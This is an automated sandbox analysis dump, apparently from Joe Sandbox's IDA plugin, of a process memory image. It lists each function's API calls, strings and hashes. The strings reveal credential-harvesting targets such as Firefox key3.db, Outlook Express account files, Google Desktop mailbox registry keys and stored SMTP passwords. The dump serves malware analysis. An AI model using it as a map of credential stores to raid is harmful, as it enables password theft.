                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memcpy
                                      • String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
                                      • API String ID: 3510742995-3170954634
                                      • Opcode ID: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                      • Instruction ID: e987c9c84479fff69dc62f11a90029b17cbd8b5ab9a96ddea988199e68ce63eb
                                      • Opcode Fuzzy Hash: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                      • Instruction Fuzzy Hash: 2361C235B006259FCB04DF68E484BAEFBF1BF44314F55809AE904AB352D738E980CB98
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memcmp$memcpy
                                      • String ID: @ $SQLite format 3
                                      • API String ID: 231171946-3708268960
                                      • Opcode ID: 88de2badfc1d71e4fe38edb0c0075e708ac09094af51dabb08af60798be72297
                                      • Instruction ID: bab8e9e22e0f3e3322208b515ecc9156aa125374c4e71f07eecd891e4e8170cf
                                      • Opcode Fuzzy Hash: 88de2badfc1d71e4fe38edb0c0075e708ac09094af51dabb08af60798be72297
                                      • Instruction Fuzzy Hash: 1851BFB1E002099BDB20DF69C981BEAB7F4AF54304F10056FE44597742E7B8EA85CB98
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memcpy$memset
                                      • String ID: winWrite1$winWrite2
                                      • API String ID: 438689982-3457389245
                                      • Opcode ID: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                      • Instruction ID: c2532708ffcca3880dfc28061b61c902a2330187b6102c2a8a28e688d44e82e0
                                      • Opcode Fuzzy Hash: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                      • Instruction Fuzzy Hash: 86418072A00209EBDF00DF95CC85BDE7775FF85315F14411AE924A7280D778EAA4CB99
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memcpymemset
                                      • String ID: winRead
                                      • API String ID: 1297977491-2759563040
                                      • Opcode ID: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                      • Instruction ID: 3ec02e552038d814b148e8dc6d2e6fcfdb14063e9eab1ef980803e4d567ed084
                                      • Opcode Fuzzy Hash: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                      • Instruction Fuzzy Hash: DC31C372A00218ABDF10DF69CC46ADF776AEF84314F184026FE14DB241D334EE948BA9
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memcpymemset
                                      • String ID: gj
                                      • API String ID: 1297977491-4203073231
                                      • Opcode ID: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                      • Instruction ID: 902d5c3a1247e7abcff0c4a84da7d54d3a467651d8a5431b25503c8ae0e770b6
                                      • Opcode Fuzzy Hash: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                      • Instruction Fuzzy Hash: AF216A733443402BF7259A3ACC41B5B775DDFCA318F16041EF68A8B342E67AEA058715
                                      APIs
                                        • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                        • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040AB7D,?,<item>), ref: 00406D4D
                                      • memset.MSVCRT ref: 0040AB9C
                                        • Part of subcall function 00411004: memcpy.MSVCRT ref: 00411072
                                        • Part of subcall function 0040A4E6: _mbscpy.MSVCRT ref: 0040A4EB
                                        • Part of subcall function 0040A4E6: _strlwr.MSVCRT ref: 0040A52E
                                      • sprintf.MSVCRT ref: 0040ABE1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: FileWrite_mbscpy_strlwrmemcpymemsetsprintfstrlen
                                      • String ID: <%s>%s</%s>$</item>$<item>
                                      • API String ID: 3337535707-2769808009
                                      • Opcode ID: 2bb92dba7cae12865da671c0fcd3b112093d4a92d1dc9d46927f4f4684118477
                                      • Instruction ID: d3fada9700ccfca67da5e06a008153287a477451e6e6bd371d19fa9d49944530
                                      • Opcode Fuzzy Hash: 2bb92dba7cae12865da671c0fcd3b112093d4a92d1dc9d46927f4f4684118477
                                      • Instruction Fuzzy Hash: 50110631A00216BFEB11AF18CD42F99BB64FF0831CF10402AF509665A1DB79B970CB98
                                      APIs
                                      • GetParent.USER32(?), ref: 004090C2
                                      • GetWindowRect.USER32(?,?), ref: 004090CF
                                      • GetClientRect.USER32(00000000,?), ref: 004090DA
                                      • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                                      • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: Window$Rect$ClientParentPoints
                                      • String ID:
                                      • API String ID: 4247780290-0
                                      • Opcode ID: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                      • Instruction ID: bdfce0b549e0f997c013470e25be1f804495b962c90005f3873202e4793523b9
                                      • Opcode Fuzzy Hash: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                      • Instruction Fuzzy Hash: 6A012D36801129BBDB119FA59C89EFFBFBCFF46750F044125FD05A2141D77455018BA5
                                      APIs
                                      • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 0040B9B1
                                        • Part of subcall function 00406C62: LoadCursorA.USER32(00000000,00007F02), ref: 00406C69
                                        • Part of subcall function 00406C62: SetCursor.USER32(00000000), ref: 00406C70
                                      • SendMessageA.USER32(?,00001009,00000000,00000000), ref: 0040B9D4
                                        • Part of subcall function 0040B903: sprintf.MSVCRT ref: 0040B929
                                        • Part of subcall function 0040B903: sprintf.MSVCRT ref: 0040B953
                                        • Part of subcall function 0040B903: _mbscat.MSVCRT ref: 0040B966
                                        • Part of subcall function 0040B903: SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
                                      • SetCursor.USER32(?,?,0040CBD2), ref: 0040B9F9
                                      • SetFocus.USER32(?,?,?,0040CBD2), ref: 0040BA0B
                                      • SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 0040BA22
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: MessageSend$Cursor$sprintf$FocusLoad_mbscat
                                      • String ID:
                                      • API String ID: 2374668499-0
                                      • Opcode ID: fb4c2d2117a6e63931818c59792b7e5b7d388045a30bfc7bbc7a4f43378f101d
                                      • Instruction ID: f32a2dbc35f7bf6d698eec3472f2a5e56a7287d41e7566127b95ec9cf4f32314
                                      • Opcode Fuzzy Hash: fb4c2d2117a6e63931818c59792b7e5b7d388045a30bfc7bbc7a4f43378f101d
                                      • Instruction Fuzzy Hash: 450129B5204604EFD326AB75DC85FA6B7E8FF48305F0504B9F2499B271CA716D018B14
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: ??3@
                                      • String ID:
                                      • API String ID: 613200358-0
                                      • Opcode ID: c45a219b033b3f4569339e018fe7ecbbef235cfad79d4e0063602ba8b31e0023
                                      • Instruction ID: b8efe39ffa321d4f2ce8ce974eba3160cbf96dc633dc1e2aadb4e529a4dc2577
                                      • Opcode Fuzzy Hash: c45a219b033b3f4569339e018fe7ecbbef235cfad79d4e0063602ba8b31e0023
                                      • Instruction Fuzzy Hash: A9F0F4726057855BD7209F6999C1A57F7D9BB98714791083FF189F3A81CB38FC404A18
                                      APIs
                                        • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT ref: 00409A3E
                                        • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT ref: 00409A4C
                                        • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT ref: 00409A5D
                                        • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT ref: 00409A74
                                        • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT ref: 00409A7D
                                      • ??3@YAXPAX@Z.MSVCRT ref: 00409AB3
                                      • ??3@YAXPAX@Z.MSVCRT ref: 00409AC6
                                      • ??3@YAXPAX@Z.MSVCRT ref: 00409AD9
                                      • ??3@YAXPAX@Z.MSVCRT ref: 00409AEC
                                      • ??3@YAXPAX@Z.MSVCRT ref: 00409B00
                                        • Part of subcall function 00407A55: ??3@YAXPAX@Z.MSVCRT ref: 00407A5C
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: ??3@
                                      • String ID:
                                      • API String ID: 613200358-0
                                      • Opcode ID: b0df650d73306e27691e5daf7003448de6eaa28b93c8488f2c6c21201bf7abc7
                                      • Instruction ID: 0e1833da384361268bbd99a4020487bffb4c29eeff2b5ca4c2d3cb4a232d8152
                                      • Opcode Fuzzy Hash: b0df650d73306e27691e5daf7003448de6eaa28b93c8488f2c6c21201bf7abc7
                                      • Instruction Fuzzy Hash: 3FF0A932F068B05BC2117B669002B0EB398AD81B2831A016FF8147B6D2CB3CBC504ADE
                                      APIs
                                        • Part of subcall function 00407107: memset.MSVCRT ref: 00407127
                                        • Part of subcall function 00407107: GetClassNameA.USER32(?,00000000,000000FF), ref: 0040713A
                                        • Part of subcall function 00407107: _strcmpi.MSVCRT ref: 0040714C
                                      • SetBkMode.GDI32(?,00000001), ref: 0041079E
                                      • GetSysColor.USER32(00000005), ref: 004107A6
                                      • SetBkColor.GDI32(?,00000000), ref: 004107B0
                                      • SetTextColor.GDI32(?,00C00000), ref: 004107BE
                                      • GetSysColorBrush.USER32(00000005), ref: 004107C6
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: Color$BrushClassModeNameText_strcmpimemset
                                      • String ID:
                                      • API String ID: 2775283111-0
                                      • Opcode ID: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                                      • Instruction ID: 687cb18978465a3feaaa07aa3b8de37e8775815fe2b8de28c5581ef0bdca0d30
                                      • Opcode Fuzzy Hash: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                                      • Instruction Fuzzy Hash: AAF03135101109BBCF112FA5DC49ADE3F25EF05711F14812AFA25A85F1CBB5A990DF58
                                      APIs
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004147CE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                      • String ID: winSeekFile$winTruncate1$winTruncate2
                                      • API String ID: 885266447-2471937615
                                      • Opcode ID: 3989f365befeb7fb84bae78e7a4911c3188eb7aafc144da4ed62710c54f6e9f9
                                      • Instruction ID: 76c2d8f9c45a6ab14154b13c081d04d7f34c1e3f6c53ca943db3ce1179081271
                                      • Opcode Fuzzy Hash: 3989f365befeb7fb84bae78e7a4911c3188eb7aafc144da4ed62710c54f6e9f9
                                      • Instruction Fuzzy Hash: 5C313175600700AFE720AF65CC41EABB7E8FB88715F104A2EF965932D1D734E8808B29
                                      APIs
                                        • Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                      • GetFileSize.KERNEL32(00000000,00000000,key3.db,00000143,00000000,?,00406C55,00000000,?,00000000,?), ref: 00406AEB
                                      • CloseHandle.KERNEL32(?,?,00406C55,00000000,?,00000000,?), ref: 00406B11
                                        • Part of subcall function 00407902: ??3@YAXPAX@Z.MSVCRT ref: 00407909
                                        • Part of subcall function 00407902: ??2@YAPAXI@Z.MSVCRT ref: 00407917
                                        • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: File$??2@??3@CloseCreateHandleReadSize
                                      • String ID: Ul@$key3.db
                                      • API String ID: 1968906679-1563549157
                                      • Opcode ID: 017d44aeec099e6ad840d6e86d2f8ec0eb2b3f662b3005ae3e25e14883e9f582
                                      • Instruction ID: 1a03c8060d8a16f0d136589656c0636480a797a3ae37aee6ed6b4138e5904ac9
                                      • Opcode Fuzzy Hash: 017d44aeec099e6ad840d6e86d2f8ec0eb2b3f662b3005ae3e25e14883e9f582
                                      • Instruction Fuzzy Hash: EA1181B1D00624ABCB10AF25DC8588E7FB5EF45364B15C177F80AEB291D638ED61CB98
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: _strcmpi$_mbscpy
                                      • String ID: smtp
                                      • API String ID: 2625860049-60245459
                                      • Opcode ID: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                                      • Instruction ID: 1dd5f7db1b4edf1a80ad81ce147274c535078e8a2a303909ef95c05f23963bac
                                      • Opcode Fuzzy Hash: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                                      • Instruction Fuzzy Hash: DB11C872500219ABEB10AB66CC41A8A7399EF40358F10453BE945F71C2EF39E9698B98
                                      APIs
                                        • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                      • memset.MSVCRT ref: 00408258
                                        • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082A6
                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082C3
                                      Strings
                                      • Software\Google\Google Desktop\Mailboxes, xrefs: 00408230
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: Close$EnumOpenmemset
                                      • String ID: Software\Google\Google Desktop\Mailboxes
                                      • API String ID: 2255314230-2212045309
                                      • Opcode ID: b9c6ba0a09f39c77023865a56f43d31249d27d4aeb116fb61def55debc704f1d
                                      • Instruction ID: e7ff4aa50d33639bacb2d5000aefce928628a80d8311d3545e17288fa3d3d8ee
                                      • Opcode Fuzzy Hash: b9c6ba0a09f39c77023865a56f43d31249d27d4aeb116fb61def55debc704f1d
                                      • Instruction Fuzzy Hash: 9D118F72408345ABD710EE51DC01EABBBACEFD0344F04093EBD9491091EB75D958C6AA
                                      APIs
                                      • memset.MSVCRT ref: 0040C28C
                                      • SetFocus.USER32(?,?), ref: 0040C314
                                        • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: FocusMessagePostmemset
                                      • String ID: S_@$l
                                      • API String ID: 3436799508-4018740455
                                      • Opcode ID: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                                      • Instruction ID: f4172cee4733ded4edf5c13384372fb960b3a31eee454cf66b40e3553cb76095
                                      • Opcode Fuzzy Hash: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                                      • Instruction Fuzzy Hash: 1411A172900158CBDF219B14CD457DE7BB9AF81308F0800F5E94C7B296C7B45A89CFA9
                                      APIs
                                      • memset.MSVCRT ref: 004092C0
                                      • GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                      • _mbscpy.MSVCRT ref: 004092FC
                                      Strings
                                      • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 004092A9
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: PrivateProfileString_mbscpymemset
                                      • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>
                                      • API String ID: 408644273-3424043681
                                      • Opcode ID: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                                      • Instruction ID: a8dcbc571cfa5336c44be942190f1d9429afcf202dd246abef1f156f809eb6de
                                      • Opcode Fuzzy Hash: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                                      • Instruction Fuzzy Hash: 02F0E0725011A83AEB1297549C02FCA779CCB0D307F1440A2B749E20C1D5F8DEC44A9D
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: _mbscpy
                                      • String ID: C^@$X$ini
                                      • API String ID: 714388716-917056472
                                      • Opcode ID: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                      • Instruction ID: 848b4a5d233ab05c703a0d630411b91f0640a461eb42b4d170138ac17b774cf5
                                      • Opcode Fuzzy Hash: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                      • Instruction Fuzzy Hash: F601B2B1D002489FDB50DFE9D9856CEBFF4AB08318F10802AE415F6240EB7895458F59
                                      APIs
                                        • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                        • Part of subcall function 00406FC7: _mbscpy.MSVCRT ref: 00407011
                                      • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                      • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                      • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                      • String ID: MS Sans Serif
                                      • API String ID: 3492281209-168460110
                                      • Opcode ID: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                                      • Instruction ID: 97d77737ff66efe52178e6fda6de2dc92fca71035f8b3f8e7b76904d62d162b3
                                      • Opcode Fuzzy Hash: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                                      • Instruction Fuzzy Hash: F5F02775A4130477E7317BA0EC47F4A3BACAB41B00F044535F652B50E1D2F4A404CB48
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: ClassName_strcmpimemset
                                      • String ID: edit
                                      • API String ID: 275601554-2167791130
                                      • Opcode ID: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                                      • Instruction ID: 4378e7120b76b93f9ba7f3ad81c4d59275eb15acd3879ac3f183c71196eabbb1
                                      • Opcode Fuzzy Hash: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                                      • Instruction Fuzzy Hash: ADE09BB2C4016A6AEB21A664DC01FE5776CDF59704F0400B6B945E2081E6A4A6884A95
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: strlen$_mbscat
                                      • String ID: 3CD
                                      • API String ID: 3951308622-1938365332
                                      • Opcode ID: d1143cf22a6afbd37b374b0806e036797619bbf072935b8337c8bafa4bdf7e65
                                      • Instruction ID: 1107c6f19d6a4433d5fdc1d3c5cfb72f3531f1d81a70b052f8a244d3c085287a
                                      • Opcode Fuzzy Hash: d1143cf22a6afbd37b374b0806e036797619bbf072935b8337c8bafa4bdf7e65
                                      • Instruction Fuzzy Hash: 1BD0A77390C2603AE61566167C42F8E5BC1CFD433AB15081FF408D1281DA3DE881809D
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: _mbscat$_mbscpy
                                      • String ID: Password2
                                      • API String ID: 2600922555-1856559283
                                      • Opcode ID: 8d83a753bd2278aecac4212cdf66134528e9acc94ce1ae697df6f496e3d29f98
                                      • Instruction ID: daa9138b3154c9efe9c83666f212cf2f945430f9457ac718319f22168f8299cd
                                      • Opcode Fuzzy Hash: 8d83a753bd2278aecac4212cdf66134528e9acc94ce1ae697df6f496e3d29f98
                                      • Instruction Fuzzy Hash: 5BC01202A4667032210275555D07F8E5818CE9279B704005BB90832113D61D965542EF
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memset
                                      • String ID: rows deleted
                                      • API String ID: 2221118986-571615504
                                      • Opcode ID: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                      • Instruction ID: 17dfb349c3cd8fc2c2490db290532cf881f14abfa8d6012d9aa572d9710d7201
                                      • Opcode Fuzzy Hash: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                      • Instruction Fuzzy Hash: D5028171E00218AFDF14DFA5D981AEEBBB5FF08314F14005AF914B7291D7B9AA41CBA4
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memcpy$memcmp
                                      • String ID:
                                      • API String ID: 3384217055-0
                                      • Opcode ID: a7e4a582387d1845e8bd5b90d9047dd349a2d991c238cbacbbbcfe7ad7334891
                                      • Instruction ID: 8228d9f6412a3e952053f7d3f56c39de874a44e07f5fc6281cc9d0b5593e34d3
                                      • Opcode Fuzzy Hash: a7e4a582387d1845e8bd5b90d9047dd349a2d991c238cbacbbbcfe7ad7334891
                                      • Instruction Fuzzy Hash: C8215172E102896BEB19DBA5D846FAF73FCEB84700F00446AB511D7281FB28E644C765
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: ??2@$memset
                                      • String ID:
                                      • API String ID: 1860491036-0
                                      • Opcode ID: ebb40f1ae782bd27a9c9ebb170ff663f9279e29e1a89e233aa61efeea33ca50f
                                      • Instruction ID: bd2fcbe50e3d5b8ec1466eca70e60fda3411ba7e10a355e4f398212a99dd52d4
                                      • Opcode Fuzzy Hash: ebb40f1ae782bd27a9c9ebb170ff663f9279e29e1a89e233aa61efeea33ca50f
                                      • Instruction Fuzzy Hash: 973162B09107508FE751DF3A8845A16FBE4FF80B05F25486FD549CB2A2E779E5408B19
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memset$memcpy
                                      • String ID:
                                      • API String ID: 368790112-0
                                      • Opcode ID: e33439cddf26871f1b6b72d3f102fac71f305b2afc07238da9e6d18acb06c1a9
                                      • Instruction ID: 0e4d5a8aef3e538851842ff93af65fc880b0f2046ec3e537946e92548d274f73
                                      • Opcode Fuzzy Hash: e33439cddf26871f1b6b72d3f102fac71f305b2afc07238da9e6d18acb06c1a9
                                      • Instruction Fuzzy Hash: BB2162B650115DABDF11EE68CD41EDE77ACDF95304F0040A6B708E3151D2749F448B64
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memset$memcpy
                                      • String ID:
                                      • API String ID: 368790112-0
                                      • Opcode ID: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                      • Instruction ID: 358c417c53aa398974aae77e4359fd90ac0a4dba5340dfd55ca125e4bb0c9b0b
                                      • Opcode Fuzzy Hash: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                      • Instruction Fuzzy Hash: 8E01D8B5A40B406BE235AE25CC03F2AB3A8DF91714F400A2EF692676C1D7B8F509915D
                                      APIs
                                      • __allrem.LIBCMT ref: 00425850
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00425885
                                      • __allrem.LIBCMT ref: 00425933
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042597B
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                      • String ID:
                                      • API String ID: 1992179935-0
